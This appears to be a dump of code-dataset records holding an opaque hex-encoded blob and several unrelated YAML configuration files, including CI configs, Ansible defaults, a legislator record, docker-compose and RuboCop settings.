31613337633234646133666364303764353666326465653738396139366263303462646663653036 30323038633739393362666664616235646536336337323633386131396335653838643931643062 65656166646638663837646530373464343539306334343131326338363239393634616231383537 39383162326139656336303663666664303935303331393766346162363132623730373862396432 64393762316539303537326161656661356163613864396364666135383338313166363432663633 35613537326537663633383863346634383539316530333134303737623662646564396238363932 37363662323065366363393538646164633633333966393964356462373264643439636634366563 64376666616333386138646162333934323033386665356163343862333131633165343265643265 31633631626433643938386333356437653661346134623337653361316233323662386635346461 36666661303231623262393066363762623233626465323138653239613439353637303361323030 31353930336137616466303934643864396233656236313432393532613134616463626334663761 36666265353237663736333339366134623732653231383430353234663635356137373164613231 31366438353137613464313533376430623635363434363362346363386464323637613533623036 62653537656534353062393732343263393464656537633832323133333739626338303531656266 66396639393731393437356565336337326430663532383563313332363931376338333332633031 37643036383631653234313963306238613638646533633065383764353963653463663037323261 61633832303065316336363430333733346164366639366461316634643061343132623834323630 66626531363536663961613135323636316561353031623235323833373534353431613137336539 61343763343661313037333564386638363632656339356337663830616237636565386435663531 36356431313765363637373766383332623734393863316635346134653262383939366266373064 64376338633165356639633734336537663138336132663764616133313934653561376166333836 34386332333534623531366364653635613830623664386163653236616536373739303065303463 61383766613463306239333163363138346463633663396431326363316562666239383236663461 64303363656437613763633938333731323466303633313862353837623063633365353666393065 33353962633265666435313861613064313133613935383436643663373234306532343331326231 64303863396531343137353739303830353831333633346331353364336531396434326334623433 33616630323233666239613930306466363539313166646639643535333062656439333634643431 63353434663665386666663132393939363362323231333531386236653861376562303732623830 35643232396435353462623036326463623530343761636662623263333932343633353332363763 34303030666532326139653736386233376233393633393639623061366632326463666530626530 38333363396130333230383133656262643030353535346430366338356136646530353535363230 61613433363532333134313238383263613664363262316566376238323663626438343862313937 32396538623730386631626631396439316364396164333638353532653065326265633239363132 32383932623062613338333766616164623362313938373132333636653535326334623535613639 64613861643161643065323766353062623465646131303538353632396666616136663634363962 30643635666164393931323537393463336537653034363339636437616633643063343531343464 66346133633936666435613762303065306666386531386362343130323834323531646630633862 37633066373261613266326436316364633933613461313434366533303935323636383465376536 32633266623638663931653166303336646630666366626337393139376463613665336539303766 66333239633165366663623665396235636335326264666566636666653039373032656332373030 39636637343136386635303837303161633837373131376563616333303030313066616137656461 62666439643237326662313331653163666534663832656662336666323635383166383764613662 39653635383962313465353734303936613035363466326135643264306238393930616364373533 38343236316662356539393566383665666262623732376564363235633333373036643538323330 35666162646335613564353135666134326239656635333564313232303439323865646239383232 32306439393232656530363666356265383233656633626634383762396133626638653566646331 38383261333633386639363935326265396337663464373134663734613738613365303666613761 37363839613866333630653636623738613065626438373739356463663431633364343933326634 66343030366537373164336163343766373364653431663665653434623362633330643933613733 62386562646330633533376430316565373439666631636130316363386339356236623732343763 32666565353064613933636135306630623161313237666339633137316130653964653865336664 34303463663033666266393632346162623866326536313663613165353533303064636234363738 39396632343163323739363161386635633465336461313262653966373239316134633138346166 31326165353834613239333733326135376461386163343039373836343435616435333865366436 37353362336331623732373765383933633837393634386630653232376636336561626362633437 35346664343739356631666333306333663933363665393963386132663239613262373163326362 63636661373534316137613465613930623431663930393231376265646233613866313131336137 64353333366236306165643864663439386264623131613762363431393264386630663934626231 36383030393031363162333935356365653939336330333331313139616564623633636538626634 64623265333532613531623766366366363930613561613462343362623739656339393738333563 32383931376637626463363737323035626431386233373637663135633765326130363763316532 31616136656662636430626239663263346330313732336335656333316433616533313962326566 32643534303664363435393536616430356535643236623665633165386238346465333134353030 65363065636531373530666536346430326237373262616634636165353539333564323536303432 32333861303862623332383362653064633664663365616434303637383864393038393866313433 64313861356535336636666130653139633833313639636665313233656665626365386365346462 39333134316539373666386466313730336262376332376632613735626237623736646433303164 31626666613164653034303465366265353633306261666236613866383332383237356538643937 33393966616162346238373739306164363433643665636362663334313230613737373635383032 38323333333937356131363266653333353466626632343330663739396565336237353465323965 32363237356136626461333631316630376633383532376236613633363461376436643365616262 31663036646462393666646136633362623064663430326239663963343539396638616165393361 66346236383938383935616537346537393361643761646539623333623431643238316263666132 64323330353433616165623161633931333961343338383561626161316665616335353032383731 35646161626132326636343665616466663861643935333066383630373038383364376164626661 31316630373266623330326139333230636438333833346234393634303438383464303932336233 61356331363064663232343632646563623139333466366432376264613031313431333038373165 39643431396332306665373565666436343462363136396230326563316537613132336639366332 32386265653935363032356437356336613661373262643264353739643233343432336438396639 33316364353564386263363635613161313164633639613234313662323365306338666262643164 30613562346165396264366237343463356235366231656463386235313035663164396431353936 31653534626664393935636539653635376566306135646335663062346163643765343037333366 30653637663139383431303261663035623635633638643732303235313231646465303362313233 66393530336132623834653537373533666336353265666433343838393164356636373963346664 65663464396462653432376363613634616632653537353733373863653161346165613165633733 37326464613464376534363538363562316131643664633835333863303235316535666633383030 61336537373332363733653635346134363265386633366237393037396530323730613734633035 62336537636537653033343164646130626332626463636564343464363939383864333138653761 64373963616263353634643034386534663037383762376436353938343466643163303838343761 65383136363337643966653438333761323337656436326166373432353935613463343463393966 31633666333462623061346666306437633730643937356231623839313139623035613439643863 35386565356366643665336330393662666262306363623265623337626539623864363133326631 30396438613061333433326530643563353536343332313138643061366262633966393366623431 32396137663665393262656433303937663131376361616233393366376362316135393631626163 35653033653335353866663361363537643863393833653534626433393136343762393136353930 64633532653338653061306537633365373033633164366533326664613435393438633532666437 39653038313735643331303532396538656666396563326165336531636136373564663036636562 65396634336139343561373034333532393937333166656436633736323531306266346430333532 31393135373961623938626535303232336366396636363738393961633432643736656465666535 39663833336333356134316536653534643266646335623136363638643937616561333433666134 62353836613337333465666263313430613465633536393433653565636161636466343933346165 62356537313235356663646666386263336536363231663031333337313539613935373162326164 32353136376165393835316663353736333866666434373861356638363861633232336361346465 63343536653264666539623163376333656364313036313366373238666630396233653534323538 32376232633137613066626566643430316565393966313230353933613335383736363431363164 37396462313138613966346134303635666662623164363732383231613463346562643563343163 30616237396162666630356464616463656636373166366563353864666233323438303361373964 61656364663637616533626635346463623961323334623763393664626231306637363466393534 34646134323661626366343935663861363537366536376466343834363263333138643833306533 35636537613638313666636535633031326536303666303266356565363232393065313063356230 63383937383262373561636431303137323663336230613066373463643062653866643866626634 64323233373163376464616561613033656264333263356632353237323633303965623530653734 37346665633232356638383135303262343538646562623166326132383134613534393639333836 32616436383464626531363730316161653234376331336663653038396566373537623635323665 30623034373235366631376266666237353135366333356631313236306161303232303066353332 31383434376435646366353335623331616334303566323738303437636565346461383739323736 63633864613836633962313437636236383135346134383461326563336665303862363235616263 36386331376237323965323739636137333664373234393063623538666631633036326665633835 33656137313330383338353836363736616533343665346562666433663934613564636439663734 32623134636561653266336239303738646237366536326366646566333338383132353731646135 34663534623164646234656662623864383562393065363165393862623736613535316134383761 32633837323735636436386564313866383032323833373065633936656163363430613932303738 32636437326530343563313934353665313866623435303439343661393039353531346237663936 66666239313966343131333065313230376231623663633463653036623131636231663163666465 34333332643735343230666461356233343235653334663433663662316132373966626133326234 62366466333531396462636437396561653935376261653161323665616335663535313434646330 34303438613664646264363333646564616539333637626266306638306235393666303865313061 32346137343566613737376434343764623032323534633761376566323539633964623230383362 61306331353035396537393861333066366638303035633337366335613665333030376465313633 63633264396635646264613434333833396632393235313734333663363038366533343061383039 37386331363032343137306137663936383666353163643130643363333432343537376338393730 61323535383236316534633164653537363132623861656163386437656463363466633066386434 34313337353965343262323161396564623438626162343739663331643661303739313238646538 61666634396165323437666530323962336362333439626466303066353462666362656664323965 32396266626164386533326561366335616465636334313964646461303733333364333136383564 62646639303733656430663565313163363239393130313830303930633431636633633939633131 66623939663862613733326435653934366536383161343836306463306163343836656131323231 31316462373830643362313732316633316239313632643362343565653630366637643663373765 65666364666636376535303564376334353131633536663066666639343330353865306562366537 66623462663962643464326663613636353835663765343064353634316663663230313863353537 38323262666631373366363965363737643765306636353663303563633138636632633863623231 34636539303633373734373364316464666537613261326538363939396362343633626161616237 63383035336564376330316135653736346163313337363262326131353565386664376430323231 63316363376236636238323132366436663634666232633862356234626232313936636239366163 64393663333935643536666461666630386134363738643738333433313832653734663931326463 30393864613938633330353336393432343565336531303965663464333665363232366536666133 64386531396239373963646361356638343566323263623361643939326436366264623665383333 36636265306230643637303362353837333230306137636239313966313433303837366535306339 35656135393339366530366233346231316432363631626237303931613162656136373661353834 64653839613365333137333836396338666139656662323439333934383931633864613233316461 33343737633837616533386434356361323663633830323535326363623335386236623739653037 39373063323732366563323032333761383130633431353162306333343630666131376564303266 38303163646338373666646363613631326365343538656166613862386331363632363762643132 61333464663832396238313862343963363435336364313937346337323939656262356163663963 33356664323738363230626266326262636531396563353332346337313239633138333765383364 35386236653666333765623935383665353266343266623031616230323665653035336135303062 38333664656239313161666137333136396265653561306232636262316263333933306263343333 66656330613861396439666566626464656662616535343661303866643139306563393533656234 65323766383134343430623637303939623961343665343961383665356535323663386630373937 65313364643832323239316234303230343539653661626234343233616138303131383230653531 66666331386364636162616433356234393336633732626161383065613362303763623438366137 33333831376532313165393964343961326432633538653435393133616364656533323931373534 36626130316432663434313464653338626263653136616261363939323163633031373063306265 62383235653035643233653636663465333736663161393632646161393733313830356331333933 37616238303066623031336564666630616237356534346330666163633964633366643235316232 35333639633266633035653234373835343933633432626363323039333166653662666366666364 32393334643532643361626466363635383165363762636365636137303236313166356135633466 64613133393533353266653433623863393833356534303964623139306661633036613539616534 35356534633333353139626534333162396461653961393930643665356466633633303536623934 36323265346262326538333765666532663830313031393133653839626162393266343933383037 61316664363364643439646332653431613435643038303364356462663164663330653337363430 64346530616534346130323361366133383835343163313865633666313630346137663939663863 37356365633238386166313033643236376561643734316635626564323566393435373536616634 63306664303331313230656632643936663435303337636361636164303939346464373765373632 66643363356138333265303330356161656565353031343939373234613830313731353563653262 66393232666264626630653763303363656337623639333363663530616439336465646430303566 36633830363735643337653061623666396338393262643636656330376162363465636239326666 32653863363263643831333130383363363163303234313962616232626463376166366630346336 32373333323135663761333330316165313234346232313532303064336430336139396236646235 63356337383330316433386133383633376232613666323833376136343065356234616166613366 36326466656463636633343262336363363166656638623439336163303231666539313866396138 62613861636130353566613636316663323034343964626233376164393832343031663264643931 65333834393163333562316438316636363063663732656661613731316233353631353733336537 39666434326561386166393630633037366166343461636162363263346639623233363632383038 37303836353038326530643235643265636139633863393639323062363630306535306262326664 39633635643336633530633934333566323935353165383634343464363463383630366235383338 34396635313164333736343132636237336163366631306562626666386634636234303861626239 61393836613661303265376663313764363233343865623330353838393534366338626266623631 32336630393437316266353464653863383831396435356533346331323131333032363937343131 32303165626533336638316333363932373134663062656465646565666339333763363562303632 38323564396665306336646339316363666134313131363939613835393134383334623038336132 35666564356336626138353935666338616134616238386364356561663765646536396130323366 62343738373362646366363139386630353531313837326332343661383036373261313365386265 31373831333565383462323630303964313733313862613232303731323163316233303032626461 66383162316139386563323065386632373663393634353139313866396539336231626366333135 39303866343837336330373831613932313237356662653839303434663464363534646561306637 32333566306439386431383932376665633063316366323234623831396465383332646338616330 36666631653863386433653735363366656530363839636562356632306633386166373738393337 31656136613366626432336334306337643036643132336666633038326539356231353637366661 31346364356230343230396361626261643763653734366230633335333765636537306562666435 62653937633330353036633432326430303032616231323463396233643463663464306633393031 32366265626265326266376636613138353964383637356135396338343065393162323164363765 66626165626134363330383837323062346637383530323733396262663062646638386162383939 66383732656330313561633339636135366161333063626634663836336161333130363363383134 35616564343966353136623361386133663835626538383232336637303730643132383765353064 66333230653130316438663762656434303433363865643337353366356363663537346339623264 65613065386434363731313234636432383534623631353135303633663531666434316464323636 39313261393935393761646162666162643839316262383131383164343631303564633666613361 35303937643738626234633863666435343832313832303935366430646637393862636233366265 61393163323363373765623964666432393030663333366164333536666362666632343861643165 66373737353930316237623237646334326362376237666365623535333734336634393566356231 31363133313763623166613735313536313035353835343136343033613138306330663634373666 39373139643932386231376263663562343765363337343561373138323737663334366231386438 32303731306365623263353236323065343130613063613636333334396364316435376235346339 62343039613466646262353235613539653632373063346634313439366437656662303838303635 38633339656239356564346437616437356263633432393563303161316265346135363965346234 38633835623731636434656537323366316134313539633236336239363132356462366539333435 34306535306361376361666364633562326135643939356662373961376361633934323165636437 33636532636266333432313436306634363436386136346463633134643939346262313934316439 34646239616563663364633165333136333531623362623465666465633233656235323637623337 33373062376263303265383734396331396434356330306561383937393739316666646535326162 38303837373637376361333737626439353236373535353231636665333563646437353161383935 36333139356563613537636638373431363566306562383236623164653964653664616334663833 32333130303934393639613737396439333830643964656364303562646532626332316662636662 31393939623735666238663764323135633431306365316630383439353732666362653630366164 63343938353136343135633034343634666134616536656335633965613266356438653331623533 38613462313139626435373039343031353865303536373865386533373637386165326365616334 35383766353565303739633861626561666539646638386336396332363961386337336239326561 30363763346638663732643932333939616636653639393835383233323262386330653032303035 39626330333032353563386438323864356438353438656164303632383339663263323565333030 39623839373165633435356466663337643363393136646333666536336131646163633466353261 39353861376339323134393562626333366230303365326235383931333836653037643334353865 37613034356465366266633164393431386235616434343463646662623135316134333232363362 64346536346163633266626532666464343035383731656532613036653530356431656432616133 31386432316430663034353035393339616165333065336136353430323161306239616230346661 62363661376162316233346536323336376235663731386436393632386661393235653830343563 35343666373832633637623664663763333536356235653361666538306336326164323337356537 66656132623435313565396533663636653537653038636165633130373563316538323063653436 63656534613462623737313635626238643934626662636162363939376430306537366365383565 37633766316132323632326665656534373136396162366661623938386264333539626364323666 61633861343930336164643537653335303337666537333532343361333034346230326364366361 64366336383761323239663064363036383730383838343166626162356561663939376238393365 30333436633163613165663466316336663335663066323965663933306162333138636463373261 33356166663633383534613566343362633734653363663761633130393435663165306664666531 34343133336635356239633562313735303534313230636538646135633635363033396561633832 66643432323736646339616563663934326631653234653264353439346261636135396564303134 62623665636130653066653732356134663361663265613034346539656561306465613262613064 36333065343061343431303037346362323132306331316566353438653738623138376338303831 31346536393663353638343433383166613137616233643635376566343765396539653838343462 30396662646330383430313135613834363765393237623964363530363832393932323034373431 33626135393161356638373330623766376230383538323861666164623635373338323932346632 62303837353866313432303333643763633436386461343934666536653364653462643735376263 34303639333533373039303534636237326466363464613863623365633462656166623632393766 31613934303064623836656462376662643961343138343564326630633865376335353662633130 39616265376563343936663430623464333031623036343634356432373165633062653131306131 63613764323333373835323937643964626635336632643666373266356538383638646534616133 39373732303966633263306539343466366137343736643432646237373434663030343134666663 32326561613131626237386463396366323334663436653662653534616430636161356637333533 39646139373935636564306331366664653434353939326534393038646236356265633931663865 38396237303431333038366466303661363031303232343838326234336663616234363631333635 36336266353233303939353766663434626365393630646363613239343864313831343063633262 66376335663132626537353065393631336366626638326131663632663061386434363030663138 61336638633663353338326462316535366435393964386239656561623639313630316238396234 62663235393135313662616534643537333766316433366432663266396464663661346363306666 31383230313062383632656434373236653862333130353564363031613861613931653432353766 61623364666362366362333264376232633564306336333034373033313232663439376262363932 65346666363737613836363062376637383665663038343435666263353237306132636366333131 36313866323039393930643262636133313538303463656236613631636365613162303034303265 61366538333561653366346430383033386361636635393133336665643237336364636139633361 33643762306464323933343266343838366564663433393830613762303034333736313233333163 32616237323434643666343435316430653138336532346661663837376434336231613631373432 31633163626465633261376637623237616238653364326261623339366161666338373638343464 62656236626334313366353930373561343563316632323166633730316161393030643837663634 36613161363764633263363433376665633734653063343430316461643931643965643833363730 31396333303036333930393937623535623137666238333931373333313836633666383732353537 34306439623636343538343834373164373631303865326132326338616130636638646332363231 39623664353438343436613135323865626563663532376562313331653434326333656664353738 33366333613135366233313939613466646439306531663832383830663465323833663434343063 39623537626132663039613662653735373966623238373133316131363436363936323035363361 62636133366233313034356536386534356363663464396465316532646461626530353066386533 63343432383534326539376261363065653236613936303163363634373939323739336563323239 35666265393132323066303937656639626635373361376333353831303535643762633863326465 66366335376131656333343565616139316130376633303838636261393634363661376139613533 64643863393830663463306137633233366562363765333130366336333165313236326664633331 61323531613466386639346666303561633135663661653337663133663564333865303761643633 33366336623736363163613938396265333965663265363966333433313234323663373834656632 61396264383665653631373366386532636563636630633864336436636632383562646139303537 31613137366333656132353562663538336334306235336534383962303435343333336463343433 31336562643933316336366237363965386666376435303531616164376461346134333966663430 66393564313866633836303664343532666332613135383432363764633065633862616163646438 32346135316263383838343162613838386434373866613839336435373230386538653335613563 313663303964326333383165303237383837
80.801105
80
0.987583
91a4d7209c955de6e72e470e3f82b45b002b7ec1
222
yml
YAML
.travis.yml
bastie/PythonVampire
b5102f7389f3d583c41ec85c574ce5a72bbf4460
[ "Apache-2.0" ]
1
2020-09-05T14:02:11.000Z
2020-09-05T14:02:11.000Z
.travis.yml
bastie/PythonVampire
b5102f7389f3d583c41ec85c574ce5a72bbf4460
[ "Apache-2.0" ]
null
null
null
.travis.yml
bastie/PythonVampire
b5102f7389f3d583c41ec85c574ce5a72bbf4460
[ "Apache-2.0" ]
null
null
null
language: python python: - "nightly" # command to install dependencies install: - pip install -r requirements.txt - pip install -r requirements-devel.txt # command to run tests script: - cd src - python build.py
18.5
41
0.720721
edc64ebbde7daf3ae288462a1bc03d6957988c6c
220
yml
YAML
defaults/main.yml
wahidsadik/ansible-role-harden-centos
8dbd1aa4f1343566f69c1549396b7217e8befd44
[ "MIT" ]
1
2019-02-12T16:12:24.000Z
2019-02-12T16:12:24.000Z
defaults/main.yml
wahidsadik/ansible-role-harden-centos
8dbd1aa4f1343566f69c1549396b7217e8befd44
[ "MIT" ]
null
null
null
defaults/main.yml
wahidsadik/ansible-role-harden-centos
8dbd1aa4f1343566f69c1549396b7217e8befd44
[ "MIT" ]
null
null
null
--- enable_auto_update: True enable_fail2ban: True enable_ufw: True add_deployment_user: True deployment_user: deployer deployment_group: deployer enable_stop_password_authentication: True enable_stop_root_login: True
18.333333
41
0.863636
320b80ee4a1d891cfbef2347c61be9d967992de8
615
yml
YAML
data/fl/legislature/Thomas-Patterson-Patt-Maney-ed56c597-3652-45a5-9c01-de0bf3eb8ab9.yml
judgejudes/people
6b4284de4f1983eaee056565278d4487e72f825b
[ "CC0-1.0" ]
null
null
null
data/fl/legislature/Thomas-Patterson-Patt-Maney-ed56c597-3652-45a5-9c01-de0bf3eb8ab9.yml
judgejudes/people
6b4284de4f1983eaee056565278d4487e72f825b
[ "CC0-1.0" ]
null
null
null
data/fl/legislature/Thomas-Patterson-Patt-Maney-ed56c597-3652-45a5-9c01-de0bf3eb8ab9.yml
judgejudes/people
6b4284de4f1983eaee056565278d4487e72f825b
[ "CC0-1.0" ]
null
null
null
id: ocd-person/ed56c597-3652-45a5-9c01-de0bf3eb8ab9 name: Thomas Patterson "Patt" Maney image: https://www.myfloridahouse.gov//FileStores/Web/Imaging/Member/4764.jpg party: - name: Republican roles: - type: lower jurisdiction: ocd-jurisdiction/country:us/state:fl/government district: '4' contact_details: - note: District Office address: Suite 201, 202, 203; 115 Miracle Strip Parkway Southeast; Fort Walton Beach, FL 32548-6018 voice: 850-833-3713 - note: Capitol Office address: 1102 The Capitol; 402 South Monroe Street; Tallahassee, FL 32399-1300 voice: 850-717-5004 other_names: - name: Maney
30.75
87
0.764228
802f816fd4792418f15fd9da01fc1f81387cb44d
747
yml
YAML
dmu32/dmu32_SGP/field_meta.yml
djbsmith/dmu_products
4a6e1496a759782057c87ab5a65763282f61c497
[ "MIT" ]
null
null
null
dmu32/dmu32_SGP/field_meta.yml
djbsmith/dmu_products
4a6e1496a759782057c87ab5a65763282f61c497
[ "MIT" ]
null
null
null
dmu32/dmu32_SGP/field_meta.yml
djbsmith/dmu_products
4a6e1496a759782057c87ab5a65763282f61c497
[ "MIT" ]
null
null
null
field: SGP region: http://hedam.lam.fr/HELP/data/dmu_products/dmu2/dmu2_field_coverages/SGP_MOC.fits surveys: [ ATLAS, KIDS, PanSTARRS-3SS, VISTA-VIKING, DES ] masterlist: http://hedam.lam.fr/HELP/data/dmu_products/dmu1/dmu1_ml_SGP/data/master_catalogue_sgp_20180221.fits depths: http://hedam.lam.fr/HELP/data/dmu_products/dmu1/dmu1_ml_SGP/data/depths_sgp_20180221.fits flags: http://hedam.lam.fr/HELP/data/dmu_products/dmu6/dmu6_v_SGP/data/tiles/sgp_20180221_FILENUM_flags.fits.fits xid: None photoz: http://hedam.lam.fr/HELP/data/dmu_products/dmu24/dmu24_SGP/data/master_catalogue_sgp_20180221_photoz_20180502_r_optimised.fits cigale: None final: http://hedam.lam.fr/HELP/data/dmu_products/dmu32/dmu32_SGP/data/SGP_20180221_cigale.fits
37.35
134
0.823293
a226bc30ae80e10f842aabd05820988ee25f7e10
141
yaml
YAML
hard/219-the-tourist/meta.yaml
rdtsc/codeeval-problem-statements
c60b2886e57468e1fafcbee59073313f5bbed60a
[ "MIT" ]
10
2018-04-02T19:49:26.000Z
2021-07-06T13:49:40.000Z
hard/219-the-tourist/meta.yaml
rdtsc/codeeval-problem-statements
c60b2886e57468e1fafcbee59073313f5bbed60a
[ "MIT" ]
null
null
null
hard/219-the-tourist/meta.yaml
rdtsc/codeeval-problem-statements
c60b2886e57468e1fafcbee59073313f5bbed60a
[ "MIT" ]
18
2018-04-02T19:50:44.000Z
2021-05-14T08:58:56.000Z
problemId: 219 name: The Tourist category: Hard summary: Find the shortest route between cities. url: "https://www.codeeval.com/browse/219/"
23.5
48
0.77305
5eee59f61ce248102b96fd1bb64d31b7724ebea3
93
yml
YAML
infra/ansible/roles/elasticsearch-frontend/tasks/main.yml
moredip/microscope
26dfa02864cc87c8dfc35db97659709209d5c189
[ "MIT" ]
null
null
null
infra/ansible/roles/elasticsearch-frontend/tasks/main.yml
moredip/microscope
26dfa02864cc87c8dfc35db97659709209d5c189
[ "MIT" ]
null
null
null
infra/ansible/roles/elasticsearch-frontend/tasks/main.yml
moredip/microscope
26dfa02864cc87c8dfc35db97659709209d5c189
[ "MIT" ]
null
null
null
--- - include: kopf.yml - include: kibana.yml - include: microscope.yml - include: nginx.yml
15.5
25
0.698925
728cde3dacea5e566df779c3bab56057b501dc86
1,002
yml
YAML
.rubocop.yml
tmtmtmtm/every-politician-scraper
b9ef90a5ba752bc02daca7214e48a26e41acc433
[ "MIT" ]
1
2021-11-08T09:41:51.000Z
2021-11-08T09:41:51.000Z
.rubocop.yml
tmtmtmtm/every-politician-scraper
b9ef90a5ba752bc02daca7214e48a26e41acc433
[ "MIT" ]
null
null
null
.rubocop.yml
tmtmtmtm/every-politician-scraper
b9ef90a5ba752bc02daca7214e48a26e41acc433
[ "MIT" ]
null
null
null
require: - rubocop-performance - rubocop-minitest - rubocop-rake AllCops: Exclude: - 'Vagrantfile' - 'vendor/**/*' TargetRubyVersion: 2.6 NewCops: enable Metrics/AbcSize: Exclude: - 'test/test_helper.rb' Metrics/BlockLength: Exclude: - '**/*.gemspec' - 'test/**/*.rb' Layout/LineLength: Max: 150 Exclude: - 'test/**/*.rb' Layout/HashAlignment: EnforcedHashRocketStyle: table EnforcedColonStyle: table Lint/AssignmentInCondition: Enabled: false Naming/ClassAndModuleCamelCase: Enabled: false Style/CollectionMethods: Enabled: true Style/Documentation: Enabled: false Style/FormatStringToken: Enabled: false Style/HashSyntax: EnforcedStyle: ruby19_no_mixed_keys Style/RescueModifier: Enabled: false Style/SymbolArray: Enabled: true Style/TrailingCommaInHashLiteral: EnforcedStyleForMultiline: consistent_comma Style/TrailingCommaInArrayLiteral: EnforcedStyleForMultiline: no_comma Layout/ClassStructure: Enabled: true
15.904762
45
0.742515
72bda3ab66b41aa0e7b4ed8e3d83360ec7379adf
948
yml
YAML
.travis.yml
thomasjpfan/pytorch_refinenet
8129077100f54ae4961a5d8e9e3f4924c78e8b67
[ "MIT" ]
166
2017-09-07T01:24:05.000Z
2022-03-08T02:29:42.000Z
.travis.yml
Pandinosaurus/pytorch_refinenet
8129077100f54ae4961a5d8e9e3f4924c78e8b67
[ "MIT" ]
6
2017-11-05T20:18:06.000Z
2019-11-08T03:21:04.000Z
.travis.yml
Pandinosaurus/pytorch_refinenet
8129077100f54ae4961a5d8e9e3f4924c78e8b67
[ "MIT" ]
34
2017-09-02T06:51:59.000Z
2022-03-08T02:29:42.000Z
language: python python: - "3.6" cache: apt: true timeout: 1000 directories: - $HOME/cache before_cache: - find ${HOME}/conda/pkgs/ -mindepth 1 -maxdepth 1 -type d -exec rm -rf {} \; install: - sudo apt-get update - mkdir -p ${HOME}/cache/pkgs - "[ ! -f ${HOME}/cache/miniconda.sh ] && wget https://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ${HOME}/cache/miniconda.sh || :" - bash ${HOME}/cache/miniconda.sh -b -p ${HOME}/conda && export PATH=${HOME}/conda/bin:$PATH - rm -rf ${HOME}/conda/pkgs && ln -s ${HOME}/cache/pkgs ${HOME}/conda/pkgs - hash -r - conda config --set always_yes yes --set changeps1 no - conda info -a - conda create -q -n pytorch-dev - source activate pytorch-dev - conda install pytest pytest-cov coveralls - conda install pytorch-cpu torchvision-cpu -c pytorch - pip install -e . script: - pytest tests --cov=pytorch_refinenet after_success: - coveralls
29.625
154
0.665612
a72e24077dcd6604435136a24667e7e4ceb259af
1,573
yml
YAML
students/k3342/kursoviks/kiselev/docker-compose.yml
Ru1z99/ITMO_ICT_WebProgramming_2020
4c5ee1dbef1c76c5e2394265d171818940d9f744
[ "MIT" ]
null
null
null
students/k3342/kursoviks/kiselev/docker-compose.yml
Ru1z99/ITMO_ICT_WebProgramming_2020
4c5ee1dbef1c76c5e2394265d171818940d9f744
[ "MIT" ]
null
null
null
students/k3342/kursoviks/kiselev/docker-compose.yml
Ru1z99/ITMO_ICT_WebProgramming_2020
4c5ee1dbef1c76c5e2394265d171818940d9f744
[ "MIT" ]
null
null
null
version: '3' services: college_comission_db: image: postgres ports: - "5436:5432" environment: - POSTGRES_USER=postgres - POSTGRES_PASSWORD=postgres - POSTGRES_DB=college_comission volumes: - ./dbs/postgres-data:/var/lib/postgresql backend: container_name: college_comission_backend build: ./college_comission_project command: bash -c " sleep 5 && python3 manage.py makemigrations && python3 manage.py migrate && python3 manage.py runserver --insecure 0.0.0.0:8000"; volumes: - ./college_comission_project:/college_comission_project ports: - "8000:8000" depends_on: - college_comission_db frontend: container_name: college_comission_frontend build: context: ./college_comission_frontend dockerfile: Dockerfile command: npm start --start; volumes: - ./college_comission_frontend:/college_comission_frontend - /college_comission/node_modules ports: - "8080:8080" depends_on: - backend
38.365854
88
0.45391
a781b030e84073b9b0a1a39dd98aee8d440f6c88
1,191
yml
YAML
test/fixtures/formatted/changelog.yml
deckhouse/changelog-action
8790395f79aa44b1992ffd4f06fb340fc2ef53e7
[ "Apache-2.0" ]
null
null
null
test/fixtures/formatted/changelog.yml
deckhouse/changelog-action
8790395f79aa44b1992ffd4f06fb340fc2ef53e7
[ "Apache-2.0" ]
null
null
null
test/fixtures/formatted/changelog.yml
deckhouse/changelog-action
8790395f79aa44b1992ffd4f06fb340fc2ef53e7
[ "Apache-2.0" ]
null
null
null
chrony: features: - summary: d12 pull_request: https://github.com/ow/re/120 fixes: - summary: d11 pull_request: https://github.com/ow/re/110 cloud-provider-yandex: features: - summary: d22 pull_request: https://github.com/ow/re/220 fixes: - summary: d21 pull_request: https://github.com/ow/re/210 impact: >- Grafana will be restarted. Now grafana using direct (proxy) type for deckhouse datasources (main, longterm, uncached), because direct(browse) datasources type is depreated now. And alerts don't work with direct data sources. Provisioning datasources from secret instead configmap. Deckhouse datasources need client certificates to connect to prometheus or trickter. Old cm leave to prevent mount error while terminating. - summary: d29 pull_request: https://github.com/ow/re/290 - summary: d00029 pull_request: https://github.com/ow/re/291 kube-dns: features: - summary: widlcard domains support pull_request: https://github.com/ow/re/491 impact: So good. fixes: - summary: d48 pull_request: https://github.com/ow/re/480
32.189189
100
0.674223
4dd2bc0e429032598ecfdd0f0666ed9dfd8f3da5
297
yml
YAML
.travis.yml
ajlai/postcss_transformer.dart
df4ca5521e2a929b22b3dbb9e6571550eecf4f5d
[ "MIT" ]
8
2015-11-01T19:30:26.000Z
2019-05-08T19:53:42.000Z
.travis.yml
ajlai/postcss_transformer.dart
df4ca5521e2a929b22b3dbb9e6571550eecf4f5d
[ "MIT" ]
4
2015-11-01T09:07:36.000Z
2019-10-16T16:45:20.000Z
.travis.yml
ajlai/postcss_transformer.dart
df4ca5521e2a929b22b3dbb9e6571550eecf4f5d
[ "MIT" ]
4
2016-04-13T08:19:01.000Z
2020-12-03T07:29:52.000Z
language: dart dart: - stable env: - POSTCSS="postcss" POSTCSS_CLI="postcss-cli" AUTOPREFIXER="autoprefixer" install: - travis_retry pub get - travis_retry nvm install node - travis_retry npm install --global $POSTCSS $POSTCSS_CLI $AUTOPREFIXER script: - pub run grinder:grinder build
24.75
75
0.754209
ac882049e855ba21732f936593091895357ff154
4,519
yml
YAML
.github/workflows/release.yml
cloudflightio/winget-pkgs
6f3b6efc917af2750abc6501cc96f3996a364087
[ "Apache-2.0" ]
2
2022-02-03T08:35:28.000Z
2022-02-17T10:23:57.000Z
.github/workflows/release.yml
cloudflightio/winget-pkgs
6f3b6efc917af2750abc6501cc96f3996a364087
[ "Apache-2.0" ]
null
null
null
.github/workflows/release.yml
cloudflightio/winget-pkgs
6f3b6efc917af2750abc6501cc96f3996a364087
[ "Apache-2.0" ]
null
null
null
